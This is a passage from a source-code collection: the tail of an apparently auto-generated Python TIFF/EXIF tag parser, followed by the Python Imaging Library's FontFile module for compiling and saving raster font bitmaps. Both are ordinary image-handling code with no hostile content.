37388 noise = 37389 focal_plane_x_resolution = 37390 focal_plane_y_resolution = 37391 focal_plane_resolution_unit = 37392 image_number = 37393 security_classification = 37394 image_history = 37395 subject_area = 37396 exposure_index = 37397 tiff_ep_standard_id = 37398 sensing_method = 37399 cip3_data_file = 37434 cip3_sheet = 37435 cip3_side = 37436 sto_nits = 37439 maker_note = 37500 user_comment = 37510 sub_sec_time = 37520 sub_sec_time_original = 37521 sub_sec_time_digitized = 37522 ms_document_text = 37679 ms_property_set_storage = 37680 ms_document_text_position = 37681 image_source_data = 37724 ambient_temperature = 37888 humidity = 37889 pressure = 37890 water_depth = 37891 acceleration = 37892 camera_elevation_angle = 37893 xp_title = 40091 xp_comment = 40092 xp_author = 40093 xp_keywords = 40094 xp_subject = 40095 flashpix_version = 40960 color_space = 40961 exif_image_width = 40962 exif_image_height = 40963 related_sound_file = 40964 interop_offset = 40965 samsung_raw_pointers_offset = 40976 samsung_raw_pointers_length = 40977 samsung_raw_byte_order = 41217 samsung_raw_unknown = 41218 flash_energy2 = 41483 spatial_frequency_response2 = 41484 noise2 = 41485 focal_plane_x_resolution2 = 41486 focal_plane_y_resolution2 = 41487 focal_plane_resolution_unit2 = 41488 image_number2 = 41489 security_classification2 = 41490 image_history2 = 41491 subject_location = 41492 exposure_index2 = 41493 tiff_ep_standard_id2 = 41494 sensing_method2 = 41495 file_source = 41728 scene_type = 41729 cfa_pattern = 41730 custom_rendered = 41985 exposure_mode = 41986 white_balance = 41987 digital_zoom_ratio = 41988 focal_length_in35mm_format = 41989 scene_capture_type = 41990 gain_control = 41991 contrast = 41992 saturation = 41993 sharpness = 41994 device_setting_description = 41995 subject_distance_range = 41996 image_unique_id = 42016 owner_name = 42032 serial_number = 42033 lens_info = 42034 lens_make = 42035 lens_model = 42036 lens_serial_number = 42037 gdal_metadata = 42112 gdal_no_data = 42113 gamma = 42240 expand_software = 44992 expand_lens = 44993 expand_film = 44994 expand_filter_lens = 44995 expand_scanner = 44996 expand_flash_lamp = 44997 pixel_format = 48129 transformation = 48130 uncompressed = 48131 image_type = 48132 image_width2 = 48256 image_height2 = 48257 width_resolution = 48258 height_resolution = 48259 image_offset = 48320 image_byte_count = 48321 alpha_offset = 48322 alpha_byte_count = 48323 image_data_discard = 48324 alpha_data_discard = 48325 oce_scanjob_desc = 50215 oce_application_selector = 50216 oce_id_number = 50217 oce_image_logic = 50218 annotations = 50255 print_im = 50341 original_file_name = 50547 uspto_original_content_type = 50560 dng_version = 50706 dng_backward_version = 50707 unique_camera_model = 50708 localized_camera_model = 50709 cfa_plane_color = 50710 cfa_layout = 50711 linearization_table = 50712 black_level_repeat_dim = 50713 black_level = 50714 black_level_delta_h = 50715 black_level_delta_v = 50716 white_level = 50717 default_scale = 50718 default_crop_origin = 50719 default_crop_size = 50720 color_matrix1 = 50721 color_matrix2 = 50722 camera_calibration1 = 50723 camera_calibration2 = 50724 reduction_matrix1 = 50725 reduction_matrix2 = 50726 analog_balance = 50727 as_shot_neutral = 50728 as_shot_white_xy = 50729 baseline_exposure = 50730 baseline_noise = 50731 baseline_sharpness = 50732 bayer_green_split = 50733 linear_response_limit = 50734 camera_serial_number = 50735 dng_lens_info = 50736 chroma_blur_radius = 50737 anti_alias_strength = 50738 shadow_scale = 50739 sr2_private = 50740 maker_note_safety = 50741 raw_image_segmentation = 50752 calibration_illuminant1 = 50778 calibration_illuminant2 = 50779 best_quality_scale = 50780 raw_data_unique_id = 50781 alias_layer_metadata = 50784 original_raw_file_name = 50827 original_raw_file_data = 50828 active_area = 50829 masked_areas = 50830 as_shot_icc_profile = 50831 as_shot_pre_profile_matrix = 50832 current_icc_profile = 50833 current_pre_profile_matrix = 50834 colorimetric_reference = 50879 s_raw_type = 50885 panasonic_title = 50898 panasonic_title2 = 50899 camera_calibration_sig = 50931 profile_calibration_sig = 50932 profile_ifd = 50933 as_shot_profile_name = 50934 noise_reduction_applied = 50935 profile_name = 50936 profile_hue_sat_map_dims = 50937 profile_hue_sat_map_data1 = 50938 profile_hue_sat_map_data2 = 50939 profile_tone_curve = 50940 profile_embed_policy = 50941 profile_copyright = 50942 forward_matrix1 = 50964 forward_matrix2 = 50965 preview_application_name = 50966 preview_application_version = 50967 preview_settings_name = 50968 preview_settings_digest = 50969 preview_color_space = 50970 preview_date_time = 50971 raw_image_digest = 50972 original_raw_file_digest = 50973 sub_tile_block_size = 50974 row_interleave_factor = 50975 profile_look_table_dims = 50981 profile_look_table_data = 50982 opcode_list1 = 51008 opcode_list2 = 51009 opcode_list3 = 51022 noise_profile = 51041 time_codes = 51043 frame_rate = 51044 t_stop = 51058 reel_name = 51081 original_default_final_size = 51089 original_best_quality_size = 51090 original_default_crop_size = 51091 camera_label = 51105 profile_hue_sat_map_encoding = 51107 profile_look_table_encoding = 51108 baseline_exposure_offset = 51109 default_black_render = 51110 new_raw_image_digest = 51111 raw_to_preview_gain = 51112 default_user_crop = 51125 padding = 59932 offset_schema = 59933 owner_name2 = 65000 serial_number2 = 65001 lens = 65002 kdc_ifd = 65024 raw_file = 65100 converter = 65101 white_balance2 = 65102 exposure = 65105 shadows = 65106 brightness = 65107 contrast2 = 65108 saturation2 = 65109 sharpness2 = 65110 smoothness = 65111 moire_filter = 65112 def __init__(self, _io, _parent=None, _root=None): self._io = _io self._parent = _parent self._root = _root if _root else self self._read() def _read(self): self.tag = self._root.IfdField.TagEnum(self._io.read_u2be()) self.field_type = self._root.IfdField.FieldTypeEnum(self._io.read_u2be()) self.length = self._io.read_u4be() self.ofs_or_data = self._io.read_u4be() @property def type_byte_length(self): if hasattr(self, '_m_type_byte_length'): return self._m_type_byte_length if hasattr(self, '_m_type_byte_length') else None self._m_type_byte_length = (2 if self.field_type == self._root.IfdField.FieldTypeEnum.word else (4 if self.field_type == self._root.IfdField.FieldTypeEnum.dword else 1)) return self._m_type_byte_length if hasattr(self, '_m_type_byte_length') else None @property def byte_length(self): if hasattr(self, '_m_byte_length'): return self._m_byte_length if hasattr(self, '_m_byte_length') else None self._m_byte_length = (self.length * self.type_byte_length) return self._m_byte_length if hasattr(self, '_m_byte_length') else None @property def is_immediate_data(self): if hasattr(self, '_m_is_immediate_data'): return self._m_is_immediate_data if hasattr(self, '_m_is_immediate_data') else None self._m_is_immediate_data = self.byte_length <= 4 return self._m_is_immediate_data if hasattr(self, '_m_is_immediate_data') else None @property def data(self): if hasattr(self, '_m_data'): return self._m_data if hasattr(self, '_m_data') else None if not (self.is_immediate_data): io = self._root._io _pos = io.pos() io.seek(self.ofs_or_data) self._m_data = io.read_bytes(self.byte_length) io.seek(_pos) return self._m_data if hasattr(self, '_m_data') else None @property def ifd0(self): if hasattr(self, '_m_ifd0'): return self._m_ifd0 if hasattr(self, '_m_ifd0') else None _pos = self._io.pos() self._io.seek(self.ifd0_ofs) self._m_ifd0 = self._root.Ifd(self._io, self, self._root) self._io.seek(_pos) return self._m_ifd0 if hasattr(self, '_m_ifd0') else None
boretom/pyload-apkg
refs/heads/master
source/py-mods-prebuilt-x86-64/site-packages/PIL/FontFile.py
40
# # The Python Imaging Library # $Id$ # # base class for raster font file parsers # # history: # 1997-06-05 fl created # 1997-08-19 fl restrict image width # # Copyright (c) 1997-1998 by Secret Labs AB # Copyright (c) 1997-1998 by Fredrik Lundh # # See the README file for information on usage and redistribution. # import os import Image import marshal try: import zlib except ImportError: zlib = None WIDTH = 800 def puti16(fp, values): # write network order (big-endian) 16-bit sequence for v in values: if v < 0: v = v + 65536 fp.write(chr(v>>8&255) + chr(v&255)) ## # Base class for raster font file handlers. class FontFile: bitmap = None def __init__(self): self.info = {} self.glyph = [None] * 256 def __getitem__(self, ix): return self.glyph[ix] def compile(self): "Create metrics and bitmap" if self.bitmap: return # create bitmap large enough to hold all data h = w = maxwidth = 0 lines = 1 for glyph in self: if glyph: d, dst, src, im = glyph h = max(h, src[3] - src[1]) w = w + (src[2] - src[0]) if w > WIDTH: lines = lines + 1 w = (src[2] - src[0]) maxwidth = max(maxwidth, w) xsize = maxwidth ysize = lines * h if xsize == 0 and ysize == 0: return "" self.ysize = h # paste glyphs into bitmap self.bitmap = Image.new("1", (xsize, ysize)) self.metrics = [None] * 256 x = y = 0 for i in range(256): glyph = self[i] if glyph: d, dst, src, im = glyph xx, yy = src[2] - src[0], src[3] - src[1] x0, y0 = x, y x = x + xx if x > WIDTH: x, y = 0, y + h x0, y0 = x, y x = xx s = src[0] + x0, src[1] + y0, src[2] + x0, src[3] + y0 self.bitmap.paste(im.crop(src), s) # print chr(i), dst, s self.metrics[i] = d, dst, s def save1(self, filename): "Save font in version 1 format" self.compile() # font data self.bitmap.save(os.path.splitext(filename)[0] + ".pbm", "PNG") # font metrics fp = open(os.path.splitext(filename)[0] + ".pil", "wb") fp.write("PILfont\n") fp.write(";;;;;;%d;\n" % self.ysize) # HACK!!! fp.write("DATA\n") for id in range(256): m = self.metrics[id] if not m: puti16(fp, [0] * 10) else: puti16(fp, m[0] + m[1] + m[2]) fp.close() def save2(self, filename): "Save font in version 2 format" # THIS IS WORK IN PROGRESS self.compile() data = marshal.dumps((self.metrics, self.info)) if zlib: data = "z" + zlib.compress(data, 9) else: data = "u" + data fp = open(os.path.splitext(filename)[0] + ".pil", "wb") fp.write("PILfont2\n" + self.name + "\n" + "DATA\n") fp.write(data) self.bitmap.save(fp, "PNG") fp.close() save = save1 # for now